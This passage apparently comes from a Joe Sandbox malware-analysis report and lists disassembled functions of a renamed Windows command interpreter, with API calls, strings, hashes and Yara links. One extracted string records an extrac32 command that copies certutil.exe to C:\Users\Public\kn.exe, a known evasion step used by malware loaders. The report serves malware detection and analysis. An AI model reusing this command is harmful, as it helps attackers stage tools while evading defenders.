                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: iswdigit$_errnoiswalphawcschrwcstol
                                                                                          • String ID: +-~!$APerformUnaryOperation: '%c'
                                                                                          • API String ID: 2348642995-441775793
                                                                                          • Opcode ID: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                                          • Instruction ID: d18f7c49df57238008a06f6855a3e652e31171f370983c6ac220e12c435cea87
                                                                                          • Opcode Fuzzy Hash: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                                          • Instruction Fuzzy Hash: 47717A72D0AA87A6E7605F21D45017DB7A0FB89F89F54C032DA4E86394EF3DE488E750
                                                                                          Function 00007FF6A0E79400 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 161COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$ErrorInformationLastVolume_wcsicmptowupper
                                                                                          • String ID: FAT$~
                                                                                          • API String ID: 2238823677-1832570214
                                                                                          • Opcode ID: 9870e3df3003cca21a2b5bb6f1f08ea82d43fbeeb1162d01b560e5e2cc2d055c
                                                                                          • Instruction ID: 242d43b1cfb7728628448e68fcd068f145db755f7c70d8b2fde9055fa5562ba8
                                                                                          • Opcode Fuzzy Hash: 9870e3df3003cca21a2b5bb6f1f08ea82d43fbeeb1162d01b560e5e2cc2d055c
                                                                                          • Instruction Fuzzy Hash: 6371913270ABC2AAEB61CF20D8502E977A4FB49785F448135DA4D8BB59DF3CD649D700
                                                                                          Function 00007FF6A0E7D840 Relevance: 18.4, APIs: 12, Instructions: 444memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF6A0E7FE2A), ref: 00007FF6A0E7D884
                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF6A0E7FE2A), ref: 00007FF6A0E7D89D
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF6A0E7FE2A), ref: 00007FF6A0E7D94D
                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF6A0E7FE2A), ref: 00007FF6A0E7D964
                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF6A0E7DB89
                                                                                          • wcstol.MSVCRT ref: 00007FF6A0E7DBDF
                                                                                          • wcstol.MSVCRT ref: 00007FF6A0E7DC63
                                                                                          • memmove.MSVCRT ref: 00007FF6A0E7DD33
                                                                                          • memmove.MSVCRT ref: 00007FF6A0E7DE9A
                                                                                          • longjmp.MSVCRT(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF6A0E7FE2A), ref: 00007FF6A0E7DF1F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$AllocProcessmemmovewcstol$_wcsnicmplongjmp
                                                                                          • String ID:
                                                                                          • API String ID: 1051989028-0
                                                                                          • Opcode ID: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                                                                          • Instruction ID: d330437aa47cc70a5640651e8164d5cb7ec664ed0ec48994ed076a8013fe333a
                                                                                          • Opcode Fuzzy Hash: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                                                                          • Instruction Fuzzy Hash: D6029F32A0EB83A2EA249F15E44027AB6B0FB85B94F544231DA9EC7795DF7CE451E700
                                                                                          Function 00007FF6A0E786B0 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 138memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$_wcsicmp$AllocProcess
                                                                                          • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                                                                          • API String ID: 3223794493-3086019870
                                                                                          • Opcode ID: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                                                                          • Instruction ID: d44af1d4b106c26246e8a6b2118a17f0ba545764a7c632e7856fd4c84161ac27
                                                                                          • Opcode Fuzzy Hash: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                                                                          • Instruction Fuzzy Hash: AF51C475A0AB83A5FB188B25A8502797BF0FF59B50F588535C91E833A1DF3DE445E310
                                                                                          Function 00007FF6A0E82B94 Relevance: 18.1, APIs: 6, Strings: 6, Instructions: 110COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
                                                                                          • API String ID: 0-3124875276
                                                                                          • Opcode ID: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                                          • Instruction ID: 688bbc1488090e5adb3b050f572713c27a53eea7792caa7789906e93abbb11f3
                                                                                          • Opcode Fuzzy Hash: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                                          • Instruction Fuzzy Hash: BF518C70A0F643A6FB149F20A4142B86BE5BF59B85F548039DA0EC63E5DF3CA849B350
                                                                                          Function 00007FF6A0E9BFEC Relevance: 17.9, APIs: 3, Strings: 7, Instructions: 444COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E858E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF6A0E9C6DB), ref: 00007FF6A0E858EF
                                                                                            • Part of subcall function 00007FF6A0E8081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6A0E8084E
                                                                                          • towupper.MSVCRT ref: 00007FF6A0E9C1C9
                                                                                          • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E9C31C
                                                                                          • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF6A0E9C5CB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalDriveEnterEnvironmentFreeLocalSectionTypeVariabletowupper
                                                                                          • String ID: %s $%s>$PROMPT$Unknown$\$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe $x
                                                                                          • API String ID: 2242554020-619615743
                                                                                          • Opcode ID: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                                          • Instruction ID: 56f9484c40c40ceec7c6b0807a4b4c3d7668503b0554bbb665c9d023967bc7fe
                                                                                          • Opcode Fuzzy Hash: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                                          • Instruction Fuzzy Hash: 5312F831A0A753A1EA64EB25A40417AA7A0FF45BE0F544336DA6EC37E1DF3CE545E700
                                                                                          Function 00007FF6A0E86FB4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 148COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 00007FF6A0E87013
                                                                                          • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF6A0E87123
                                                                                            • Part of subcall function 00007FF6A0E81EA0: wcschr.MSVCRT(?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF6A0EA0D54), ref: 00007FF6A0E81EB3
                                                                                          • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E8706E
                                                                                          • wcsncmp.MSVCRT ref: 00007FF6A0E870A5
                                                                                          • wcsstr.MSVCRT ref: 00007FF6A0E8F9DB
                                                                                          • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E8FA00
                                                                                          • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E8FA5F
                                                                                            • Part of subcall function 00007FF6A0E8823C: FindFirstFileExW.KERNELBASE ref: 00007FF6A0E88280
                                                                                            • Part of subcall function 00007FF6A0E8823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6A0E8829D
                                                                                            • Part of subcall function 00007FF6A0E83A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF6A0E9EAC5,?,?,?,00007FF6A0E9E925,?,?,?,?,00007FF6A0E7B9B1), ref: 00007FF6A0E83A56
                                                                                          • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E8FA3D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                                                                                          • String ID: \\.\
                                                                                          • API String ID: 799470305-2900601889
                                                                                          • Opcode ID: 1d9e630e3dc056cac36988160209897b6a55c82e5470b3b56a9f5e981f117f56
                                                                                          • Instruction ID: de600996922136b9a51518139ff5f9076835da9245f7954bdafa17b165c09e2e
                                                                                          • Opcode Fuzzy Hash: 1d9e630e3dc056cac36988160209897b6a55c82e5470b3b56a9f5e981f117f56
                                                                                          • Instruction Fuzzy Hash: CA510732B0BA83E5EB608F20E8442B977A0FF89B95F595435DA4E87B94DF3CD4499300
                                                                                          Function 00007FF6A0E78B20 Relevance: 16.8, APIs: 11, Instructions: 254COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcsicmpwcschr$AttributesErrorFileLastwcsrchr
                                                                                          • String ID:
                                                                                          • API String ID: 1944892715-0
                                                                                          • Opcode ID: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                          • Instruction ID: f27df09f70129af64119d30d6957277af660f08c295208c84af130852cdf283d
                                                                                          • Opcode Fuzzy Hash: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                          • Instruction Fuzzy Hash: E2B1A171A0B783A6EB609F11A954179B6A1FF69B81F548435CA4EC73D2EF3CE444E310
                                                                                          Function 00007FF6A0E75458 Relevance: 16.7, APIs: 11, Instructions: 213fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E83578: _get_osfhandle.MSVCRT ref: 00007FF6A0E83584
                                                                                            • Part of subcall function 00007FF6A0E83578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E8359C
                                                                                            • Part of subcall function 00007FF6A0E83578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E835C3
                                                                                            • Part of subcall function 00007FF6A0E83578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E835D9
                                                                                            • Part of subcall function 00007FF6A0E83578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E835ED
                                                                                            • Part of subcall function 00007FF6A0E83578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E83602
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E754DE
                                                                                          • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00007FF6A0E71F7D), ref: 00007FF6A0E7552B
                                                                                          • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FF6A0E71F7D), ref: 00007FF6A0E7554F
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E9345F
                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF6A0E71F7D), ref: 00007FF6A0E9347E
                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF6A0E71F7D), ref: 00007FF6A0E934C3
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E934DB
                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF6A0E71F7D), ref: 00007FF6A0E934FA
                                                                                            • Part of subcall function 00007FF6A0E836EC: _get_osfhandle.MSVCRT ref: 00007FF6A0E83715
                                                                                            • Part of subcall function 00007FF6A0E836EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF6A0E83770
                                                                                            • Part of subcall function 00007FF6A0E836EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E83791
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: _get_osfhandle$ConsoleWrite$File$ByteCharLockModeMultiSharedWide$AcquireHandleReleaseTypewcschr
                                                                                          • String ID:
                                                                                          • API String ID: 1356649289-0
                                                                                          • Opcode ID: 8cb344cfa4787b055339b8a9ee12bbc5c0a371722c2d9f6503a0875dc2cc5f96
                                                                                          • Instruction ID: 8b21abd75195a1ec1b3c1c83c39120cb1d2fa2668fc59ec8e9fc465157b97cef
                                                                                          • Opcode Fuzzy Hash: 8cb344cfa4787b055339b8a9ee12bbc5c0a371722c2d9f6503a0875dc2cc5f96
                                                                                          • Instruction Fuzzy Hash: 01918432A0A643A7EB249F25E400179F7E1FB89B95F554139DA4E83B95DF3CD444DB00
                                                                                          Function 00007FF6A0E986FC Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 226timeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: LocalTime$ErrorLast_get_osfhandle
                                                                                          • String ID: %s$/-.$:
                                                                                          • API String ID: 1644023181-879152773
                                                                                          • Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                                          • Instruction ID: c90b77946093ed0a62fd9608ecb1794cd83d947e291c71511e8aea78889d9121
                                                                                          • Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                                          • Instruction Fuzzy Hash: 9A91C332A0A683A5EB649B64D5402BEA3A0FF84BC4F944536DA4EC37E5DF3CE545E310
                                                                                          Function 00007FF6A0E9627C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 95synchronizationCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6A0E97251), ref: 00007FF6A0E9628E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: ObjectSingleWait
                                                                                          • String ID: wil
                                                                                          • API String ID: 24740636-1589926490
                                                                                          • Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                                          • Instruction ID: a0eb131649ac1e2741cafb80f6fe0d69fb053487fc8dc786e73e7085e1ab581b
                                                                                          • Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                                          • Instruction Fuzzy Hash: 0F413031A0A643A3F7608B25E44027AA6A1FFC67C1F649132E92DC6BD4DF7DE845A701
                                                                                          Function 00007FF6A0E9CDC0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 94windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                                                                          • String ID: $Application$System
                                                                                          • API String ID: 3377411628-1881496484
                                                                                          • Opcode ID: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                                                                          • Instruction ID: 2a4dc7fac50ed1507ca2ed8cef443dd77f3d9b12d046da0ded3557cb51d3352c
                                                                                          • Opcode Fuzzy Hash: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                                                                          • Instruction Fuzzy Hash: 11414872B09B42AAE7209B60E4403ED77B5FB89749F545136EA4E83B98EF3CD145C740
                                                                                          Function 00007FF6A0E714E8 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 64COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
